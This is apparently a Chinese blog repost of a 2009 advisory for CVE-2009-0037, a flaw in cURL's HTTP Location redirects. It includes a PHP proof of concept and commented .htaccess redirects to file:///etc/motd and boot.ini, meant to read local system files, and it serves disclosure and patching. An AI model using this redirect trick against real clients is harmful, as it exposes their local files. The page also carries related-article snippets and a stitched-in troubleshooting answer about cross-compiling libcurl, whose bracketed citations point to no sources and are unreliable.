cURL/libcURL HTTP Location:重新定向绕过安全限制漏洞

最新推荐文章于 2024-08-09 15:02:31 发布
原创 最新推荐文章于 2024-08-09 15:02:31 发布 · 1.6k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#redirect #http服务器 #file #.htaccess #url #header

cURL在处理HTTP重定向时存在漏洞,恶意服务器可通过特制URL覆盖或泄露本地文件内容,甚至执行任意命令。该漏洞影响cURL版本5.11至7.19.3,7.19.4版本已修复。

发布日期:2009-03-03
更新日期:2009-03-04

受影响系统:

Daniel Stenberg curl 5.11 - 7.19.3

不受影响系统:

Daniel Stenberg curl 7.19.4

描述:

BUGTRAQID: 33962
CVE(CAN) ID: CVE-2009-0037

cURL是命令行传输文件工具,支持FTP、FTPS、HTTP、HTTPS、GOPHER、TELNET、DICT、FILE和LDAP。

跟随HTTP Location:的cURL会重新定向到scp:或file:// URL,因此如果用户点击了特制的重新定向URL的话(例如libcurl客户端读取RSS源),恶意的HTTP服务器就可以覆盖或泄露任意本地文件系统的内容,或执行任意命令。

<*来源:David Kierznowski

链接:http://secunia.com/advisories/34138/
http://marc.info/?l=full-disclosure&m=123608232412287&q=p5
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php
// This is an example of a vulnerable peice of PHP code
// If libcurl uses CURLOPT_FOLLOWLOCATION it could lead
// to arbitrary file access.
// The malicious redirect on withdk.com looks like this
// in .htaccess:
// # for Linux
// redirect 302 /test file:///etc/motd
// # for Win32
// redirect 302 /test file:///c:/boot.ini
// print_r ( curl_version() );
$c = new cc;
$c->fetch('http://withdk.com/malicious-redirect');
class cc {
function fetch($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $url);
$result1 = curl_exec($ch);
echo $result1;
curl_close($ch);
}
}
?>

建议:

厂商补丁:

Daniel Stenberg
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://curl.haxx.se/download/curl-7.19.4.zip

最新kali之curl(二)
vanony的博客
01-23 1099
描述:   传送网址。   curl是一个工具,使用支持的协议(DICT、FILE、FTP、FTPS、GOPHER、HTTPHTTPS、IMAP、IMAPS、LDAP、LDAPS、MQTT、POP3、POP3S、RTMP、RTMPS、RTSP、SCP、SFTP、SMB、SMBS、SMTP、SMTPS、TELNET和TFTP)从服务器传输数据。该命令被设计为无需用户交互即可工作。   curl提供了大量有用的技巧,如代理支持、用户身份验证、FTP上传、HTTP post、SSL连接、cookie、文件传输恢
php curl参数详解
飞越蓝天的专栏
02-21 4844
PHP CURL函数笔记说明
漏洞修复--Haxx curl 安全漏洞 (CVE-2020-8177)
Q先生
11-15 2467
漏洞修复--Haxx curl 安全漏洞 (CVE-2020-8177)
24 年了,终于有人发现 curl 的这个 Bug 了
关注微信公众号【开源Linux】,后台回复『10T』,领取10T学习资源大放送,涵盖Linux、虚拟化、容器、云计算、网络、Python、Go等书籍和视频
03-27 519
curl 作者 Daniel Stenberg 在个人博客分享了一个存在 23.9 年的 curl 漏洞curl 是常用的命令行工具,用来请求 Web 服务器,于 1997 年首次发行。据 Stenberg 透露,这个漏洞是在 curl 发布后的第 201 天引入的,但是直到第 8930 天,漏洞才修复好。一个持续了 23.9 年的漏洞背后有着怎样的故事?一切还得从 1998 年说起。curl ...
curl 身份认证绕过漏洞CVE-2023-27535)升级记录
企业实战系列集 ●●● https://ximenjianxue.blog.youkuaiyun.com
08-08 1183
curl在7.13.0-7.88.1版本中存在身份认证绕过漏洞libcurl将重用之前所创建的FTP连接,即使一个或多个参数被更改,可能会使有效用户变得不一样,从而导致使用错误的凭据进行第二次传输。官网:http://curl.haxx.se/download/影响范围:curl 7.13.0 - 7.88.1。
掰开揉碎,讲讲这个已存在近24年的CURL漏洞
smellycat000的专栏
09-08 1053
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士这是一个与cookie、Internet代码和一个CVE有关的故事。故事发生在很久以前,所以搬好小板凳,仔细听好。当然,场景时候curl,它是与我工作有关的互联网传输工具和库。1998年1998年,我们推出curl 4.9。在那个年代,少有人听说过或用过curl。距离curl 网站宣布某个新发布的下载量达到300次还有几个月的时间要过。当时,cu...
供应链安全情报 | cURL最新远程堆溢出漏洞复现与修复建议
OpenSCACommunity的博客
10-12 920
cURL 是一个支持多种网络协议的开源项目,被广泛集成到自动化构建、网络测试、网络数据采集以及其他网络相关的任务中,备受开发者和系统管理员青睐。cURL在今天下午紧急发布最新版本来修复前几日发现的高危安全漏洞,其中编号为CVE-2023-38545的漏洞cURL客户端在处理SOCKS5协议时存在的堆内存溢出漏洞
【Linux curl错误全攻略】:解决下载中的5大常见问题
![Linux使用curl下载文件命令](https://media.geeksforgeeks.org/wp-content/uploads/dict.png) # 1. Linux curl工具简介与基础...在基础用法中,curl的命令行结构通常包括三个部分:curl指令、目标URL和可选的参数。例
【php curl】php中curl的详解
编程哲学家的专栏
01-17 1095
本文我来给大家详细介绍下cURL的简单的使用方法,下文我将会给大家详细介绍cURL的高级应用, 好,废话不多说,我们先来认识下什么是cURL,可能还有很多同学没有听说过这个工具,我先来给大家简单介绍下什么是cURLcURL可以使用URL的语法模拟浏览器来传输数据, 因为它是模拟浏览器,因此它同样支持多种协议, FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DI...
嵌入式 Linux下编译并使用curl静态库
skdkjxy的专栏
10-18 4954
linux下面 编译后生成了 libcurl.a 文件,   但是在程序中静态链接  这个 libcurl.a 文件, 会发生很多的链接错误, 如果是动态链接 libcurl.a 文件则不会发生什么问题。     /usr/lib/libcurl.a(ssluse.o): In function `Curl_ossl_init': (.text+0xcd1): undefined re
curl&libcurl存在缓冲区溢出高危漏洞 (CVE-2023-38545)解决
qq_40619119的博客
10-13 7294
目前该漏洞只影响libcurl 7.69.0 ~ 8.3.0版本,不受漏洞影响的版本:libcurl < 7.69.0 和 >= 8.4.0。
服务器HTTP响应头安全性优化与漏洞修复方案
Bertram的博客
08-09 1510
服务器HTTP响应头安全性优化与漏洞修复方案
php 禁止 curl,如何防止使用PHP cURL定向
weixin_30029951的博客
03-10 939
我正在开发一个表单,其中要求将收集的数据提交到第三方网站,格式为:http://www.domain.com/page?key=value&key2=value2我决定使用cURL,因为我还没有找到让我信服的替代品.我正在运行的问题是,一旦提交表单,就会执行cURL,但我将被重定向到我指定的域.相反,我想将用户重定向到我的域内的确认页面而不是第三方网站.这是我正在使用的代码示例:$URL=...
CentOS7.6下升级curl版本至8.5.0(漏洞修复)
weixin_58949710的博客
01-19 3518
CentOS 7.6系统的curl 版本太老了,存在curl 安全漏洞CVE-2022-32221、CVE-2022-27778,所以要升级程序进行修复。
禁止linux curl抓取页面内容,curl抓取页面时遇到重定向的解决方法
weixin_32687875的博客
05-07 874
用php的curl抓取网页遇到了问题,为阐述方便,将代码简化如下:function curlGet($url) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, true);return...
HTTP协议相关漏洞
qq_48904485的博客
03-22 9952
一、HTTP协议 HTTP是一个基于请求与响应模式的、无状态的应用层协议。 请求响应   客户端要向web服务器发送一个请求以后,等待服务器回送http响应消息。 无状态   http协议整个过程当中的各种信息不会被服务器所记录下来。 常基于TCP的连接方式 ,即http是将数据打包成TCP数据包来进行传送的,绝大多数Web应用,都是构建在HTTP协议之上,即目前使用浏览器访问web网站都是以http协议为标准的。 1、HTTP协议的方法 GET :请求获取Request-URI所标识的资源 POST :
老树开新花,再看 HTTP Response Splitting 攻击
暴风一簇的专栏 (roseone)
05-20 892
 为了讲清楚这个问题,首先我们来看一个校内网的XSS。漏洞出在 http://login.xiaonei.com正常情况下,用户名处是已经htmlencode过了的(实际上 a这里是 htmlencode过的)接下来随便在什么站上构造如下form:%0d%0a%0d%0aalert(/XSS/);" method="post">                        提交该表单
libcurl 使用方法简介
热门推荐
myvest的专栏
09-30 4万+
libcurl 使用方法简介背景简介使用方法1、easy interface使用方法2、multi interface使用方法 背景 最近想做一个简单的HLS拉流程序,HTTP的下载部分觉得采用libcurl来进行比较合适及方便,所以先介绍libcurl的基本用法,然后使用libcurl完成一个简单的下载小程序。 简介 libcurl是一个跨平台的开源网络协议库,支持http, https, rt...
Web安全之服务端请求伪造漏洞
qq_52358808的博客
09-26 2147
服务端请求伪造(SSRF)漏洞 SSRF(server-side request forgery,服务端请求伪造),是一种由攻击者构造形成由服务器端发起请求的一种漏洞。从客户端发起一个请求到服务端,服务端再向另外的服务端发起请求的过程称之为服务器端请求。让服务器去请求你通常请求不到的东西。一般用来在外网探测或攻击内网服务。 常见类型 有回显:从页面中可以看到返回内容。 无回显:无法从页面中看到返回内容。 SSFRF漏洞1.原理1.1.成因1.2.场景1.3.相关函数2.利用3.危害4.防御 1.原理 .
gezi@ubuntu:~/study/pubilc/camerademo6$ file /home/gezi/study/pubilc/camerademo6/curl/lib/libcurl.so /home/gezi/study/pubilc/camerademo6/curl/lib/libcurl.so: symbolic link to libcurl.so.4.6.0
最新发布
10-11
<think>我们已知错误信息:`libcurl.so: file not recognized: File format not recognized`,并且知道`libcurl.so`是一个指向`libcurl.so.4.6.0`的符号链接。这意味着问题可能出在`libcurl.so.4.6.0`这个实际的文件上。 根据之前的分析,这个错误通常是由于库文件的架构与目标平台不匹配造成的。具体来说,我们使用的交叉编译器是`arm-linux-gnueabi-gcc`,目标平台是ARM架构,而当前链接的`libcurl.so.4.6.0`可能是为其他架构(如x86)编译的。 解决方案步骤: 1. **确认库文件架构**: 使用`file`命令检查`libcurl.so.4.6.0`的实际架构。 ```bash file /home/gezi/study/pubilc/camerademo6/curl/lib/libcurl.so.4.6.0 ``` 如果输出显示为`ELF 64-bit LSB shared object, x86-64`之类的非ARM架构,则说明库文件不对。 2. **重新编译libcurl**: 我们需要为ARM平台重新编译libcurl库。步骤如下: a. **下载libcurl源码**(如果还没有): 可以从官方下载:https://curl.se/download.html b. **配置交叉编译环境**: 确保交叉编译工具链路径已添加到`PATH`环境变量中。例如: ```bash export PATH=/home/gezi/study/work/allwinner/out/t113_i/ebyte_t113i/buildroot/buildroot/host/usr/bin:$PATH ``` c. **进入源码目录,配置并编译**: ```bash # 假设源码目录为curl-7.xx.x cd curl-7.xx.x # 清理之前可能存在的配置 make distclean # 设置交叉编译参数 ./configure --host=arm-linux-gnueabi \ --prefix=/home/gezi/study/pubilc/camerademo6/curl/arm_build \ --disable-shared # 如果需要静态库,可以加上--disable-shared,但这里我们需要动态库,所以通常不加 # 注意:如果依赖其他库(如openssl),需要先交叉编译这些依赖库,并在配置时指定路径,例如: # --with-ssl=/path/to/arm/openssl make make install ``` 这样会在`/home/gezi/study/pubilc/camerademo6/curl/arm_build`目录下生成ARM架构的libcurl库。 3. **更新编译命令**: 将程序编译命令中的头文件路径和库路径指向新编译的ARM版本库。 ```bash /home/gezi/study/work/allwinner/out/t113_i/ebyte_t113i/buildroot/buildroot/host/usr/bin/arm-linux-gnueabi-gcc -Wall \ -I/home/gezi/study/pubilc/camerademo6/curl/arm_build/include \ -o my_program camerademo.c \ -L/home/gezi/study/pubilc/camerademo6/curl/arm_build/lib \ -lcurl -pthread ``` 4. **如果问题仍然存在**: 检查是否还有其他地方引用了错误的库。可以使用`-Wl,-verbose`选项来查看链接器详细日志。 5. **注意**:确保在编译程序时没有意外地包含主机系统的头文件或链接主机系统的库。 6. **动态链接器设置**(可选): 如果程序在目标板上运行时有动态链接问题,可能需要指定动态链接器路径。在编译时添加: ```bash -Wl,--dynamic-linker=/lib/ld-linux.so.3 # 具体路径取决于目标板,可能是ld-linux-armhf.so.3等 ``` 7. **运行环境**: 将新编译的ARM版`libcurl.so.4.6.0`复制到目标板的`/usr/lib`或设置`LD_LIBRARY_PATH`环境变量指向包含该库的目录。 如果按照以上步骤操作,应该可以解决库文件格式不识别的问题。 如果用户没有libcurl源码,也可以尝试使用buildroot重新编译libcurl,因为用户已经在使用buildroot环境。在buildroot配置中启用libcurl,并确保选择正确的目标架构,然后重新编译buildroot,生成的库文件就会在输出目录中。 具体在buildroot中的操作: 1. 运行`make menuconfig` 2. 进入`Target packages` -> `Libraries` -> `Networking`,选择`curl` 3. 保存配置,然后运行`make` 4. 编译完成后,在buildroot输出目录的`host`或`target`目录下找到相应的库文件(注意:这里需要的是目标板的库,所以应该在`target`目录下,但链接时可能需要的是`staging`目录下的库,因为头文件也在那里) 然后,在编译程序时,使用buildroot生成的库路径,例如: -I/home/gezi/.../buildroot/output/host/arm-buildroot-linux-gnueabi/sysroot/usr/include -L/home/gezi/.../buildroot/output/host/arm-buildroot-linux-gnueabi/sysroot/usr/lib 这样就能确保使用正确架构的库。 总结:核心问题是要确保链接的库文件是ARM架构的,而不是x86或其他架构。 </think>### 解决 `libcurl.so: file not recognized` 错误(符号链接场景) #### 🔍 问题诊断 当 `libcurl.so` 是指向 `libcurl.so.4.6.0` 的符号链接时出现此错误,表明 **实际库文件架构不匹配** 或 **符号链接指向错误版本**。核心原因是交叉编译环境(ARM)与库文件架构(可能是 x86)不一致[^1]。 #### 🛠 详细解决步骤 ##### 1. **验证实际库文件架构** ```bash # 检查符号链接指向的实际文件 readlink -f /home/gezi/study/pubilc/camerademo6/curl/lib/libcurl.so # 验证实际文件架构(关键步骤!) file /home/gezi/study/pubilc/camerademo6/curl/lib/libcurl.so.4.6.0 ``` - ✅ **期望输出**: `ELF 32-bit LSB shared object, ARM, EABI5 version 1 (SYSV)` - ❌ **问题输出示例**: `ELF 64-bit LSB shared object, x86-64`(主机架构) ##### 2. **重建符号链接指向 ARM 版本** 若实际文件架构错误: ```bash # 删除错误符号链接 rm /home/gezi/study/pubilc/camerademo6/curl/lib/libcurl.so # 创建指向 ARM 版库的新符号链接 ln -s /path/to/correct/arm/libcurl.so.4.6.0 \ /home/gezi/study/pubilc/camerademo6/curl/lib/libcurl.so ``` ##### 3. **交叉编译 libcurl (ARM 版)** ```bash # 进入 curl 源码目录 cd curl-7.xx.x # 配置 ARM 交叉编译 ./configure --host=arm-linux-gnueabi \ --prefix=/path/to/arm-curl \ --with-zlib=/path/to/arm-zlib # 编译并安装到独立目录 make && make install ``` > **关键参数说明**[^2]: > - `--host`:指定 ARM 目标平台 > - `--prefix`:隔离 ARM 库安装路径 > - `--with-*`:指定 ARM 版依赖库路径 ##### 4. **更新编译命令** ```makefile # 修改 Makefile(示例) CC = /home/gezi/.../arm-linux-gnueabi-gcc CFLAGS = -I/path/to/arm-curl/include LDFLAGS = -L/path/to/arm-curl/lib -Wl,-rpath=/path/to/arm-curl/lib my_program: camerademo.c $(CC) $(CFLAGS) -o $@ $^ $(LDFLAGS) -lcurl -pthread ``` ##### 5. **验证链接器路径** ```bash # 检查链接器使用的库路径 LD_DEBUG=libs /home/gezi/.../arm-linux-gnueabi-gcc ... 2>&1 | grep libcurl ``` - 应输出 ARM 版库路径:`/path/to/arm-curl/lib/libcurl.so` #### ⚠️ 常见陷阱 1. **多层符号链接问题** 确保最终指向的实际文件(`libcurl.so.4.6.0`)是 ARM 架构,而不仅是符号链接正确[^3]。 2. **运行时库路径缺失** 在目标设备上设置: ```bash export LD_LIBRARY_PATH=/path/to/arm-curl/lib:$LD_LIBRARY_PATH ``` 3. **头文件污染** 使用 `-I` 参数显式指定 ARM 头文件路径,避免混用主机头文件[^1]。 #### 📊 架构兼容性检查表 | 文件类型 | 检查命令 | 期望架构 | |----------------|------------------|-----------------------| | 编译器 | `${CC} -v` | Target: arm-linux-gnueabi | | 库文件 (.so) | `file libcurl.so.4.6.0` | ARM ELF 32-bit | | 可执行文件 | `file my_program`| ARM ELF 32-bit | 通过以上步骤,可确保符号链接指向正确的 ARM 架构库文件,解决文件格式不识别问题[^1][^2][^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值